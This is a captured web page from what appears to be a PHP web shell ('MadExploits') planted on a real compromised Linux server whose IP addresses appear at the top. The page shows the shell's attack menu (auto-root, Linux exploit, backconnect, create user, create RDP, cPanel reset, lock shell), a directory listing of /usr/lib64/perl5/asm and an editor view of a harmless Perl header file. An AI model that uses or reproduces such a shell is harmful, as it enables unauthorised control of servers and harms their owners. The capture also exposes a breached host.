Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.141.32.53
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
bitsperlong.ph
429
B
-rw-r--r--
ioctl.ph
92
B
-rw-r--r--
ioctls.ph
93
B
-rw-r--r--
posix_types.ph
240
B
-rw-r--r--
posix_types_32.ph
243
B
-rw-r--r--
posix_types_64.ph
243
B
-rw-r--r--
posix_types_x32.ph
332
B
-rw-r--r--
socket.ph
93
B
-rw-r--r--
sockios.ph
94
B
-rw-r--r--
termbits.ph
95
B
-rw-r--r--
termios.ph
94
B
-rw-r--r--
unistd.ph
435
B
-rw-r--r--
unistd_32.ph
25.52
KB
-rw-r--r--
unistd_64.ph
23.38
KB
-rw-r--r--
unistd_x32.ph
30.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : unistd.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&_ASM_X86_UNISTD_H)) { eval 'sub _ASM_X86_UNISTD_H () {1;}' unless defined(&_ASM_X86_UNISTD_H); eval 'sub __X32_SYSCALL_BIT () {0x40000000;}' unless defined(&__X32_SYSCALL_BIT); if(defined(&__i386__)) { require 'asm/unistd_32.ph'; } elsif(defined(&__ILP32__)) { require 'asm/unistd_x32.ph'; } else { require 'asm/unistd_64.ph'; } } 1;
Close